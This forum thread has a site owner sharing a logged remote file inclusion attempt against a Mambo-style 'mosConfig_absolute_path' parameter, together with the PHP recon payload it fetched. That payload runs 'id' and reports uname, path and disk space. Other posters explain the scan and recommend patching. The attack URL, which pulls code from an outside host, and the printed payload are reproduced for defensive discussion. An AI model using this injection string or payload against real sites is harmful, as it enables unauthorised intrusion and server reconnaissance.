n8w Posted June 18, 2008 Share Posted June 18, 2008 Here is a 404 i received Page Requested: www.n8w.com//pear/PEAR/Frontend/CLI.php.php?mosConfig_absolute_path=http://web2.mars52.plusserver.de/contenido44/kurz/js/helpid.txt??? When I checked out the page it has this ... what is the hacker actually trying to do? <?php function ConvertBytes($number) { $len = strlen($number); if($len < 4) { return sprintf("%d b", $number); } if($len >= 4 && $len <=6) { return sprintf("%0.2f Kb", $number/1024); } if($len >= 7 && $len <=9) { return sprintf("%0.2f Mb", $number/1024/1024); } return sprintf("%0.2f Gb", $number/1024/1024/1024); } echo "Osirys<br>"; $un = @php_uname(); $id1 = system(id); $pwd1 = @getcwd(); $free1= diskfreespace($pwd1); $free = ConvertBytes(diskfreespace($pwd1)); if (!$free) {$free = 0;} $all1= disk_total_space($pwd1); $all = ConvertBytes(disk_total_space($pwd1)); if (!$all) {$all = 0;} $used = ConvertBytes($all1-$free1); $os = @PHP_OS; echo "0sirys was here ..<br>"; echo "uname -a: $un<br>"; echo "os: $os<br>"; echo "id: $id1<br>"; echo "free: $free<br>"; echo "used: $used<br>"; echo "total: $all<br>"; exit; Quote Link to comment Share on other sites More sharing options...
Jabop Posted June 18, 2008 Share Posted June 18, 2008 People try to do these types of 'hacks' a lot. A lot of CMS have had exploits that script kiddies think they can exploit, but have been fixed. I don't think it's something you should worry about. Quote Link to comment Share on other sites More sharing options...
rarebit Posted June 18, 2008 Share Posted June 18, 2008 after putting the var into google and php.net, it turns out to be something to do with the mambo cms, see http://www.google.co.uk/search?q=mosConfig_absolute_path&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a when an exploit like this is made known hackers will fire it at many sites just in-case they use the specified software and have the un-patched version... Quote Link to comment Share on other sites More sharing options...
n8w Posted June 18, 2008 Author Share Posted June 18, 2008 ahh ... what is the best way to avoid hacks? my site recently was hacked to pieces ... I am working on a sanitizing function and magic_quotes for sql injection .. but I am wondering if I should use something like http://htmlpurifier.org/comparison.html or if that is overkill? cause ideally I would like to avoid using 3rd party stuff Quote Link to comment Share on other sites More sharing options...
rarebit Posted June 18, 2008 Share Posted June 18, 2008 it all depends upon what your site does... Quote Link to comment Share on other sites More sharing options...
n8w Posted June 18, 2008 Author Share Posted June 18, 2008 well ...it mainly serves as a link portal with a searchable database and a way to upload images Quote Link to comment Share on other sites More sharing options...
Jabop Posted June 18, 2008 Share Posted June 18, 2008 ahh ... what is the best way to avoid hacks? Keep your software up to date. That's all. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.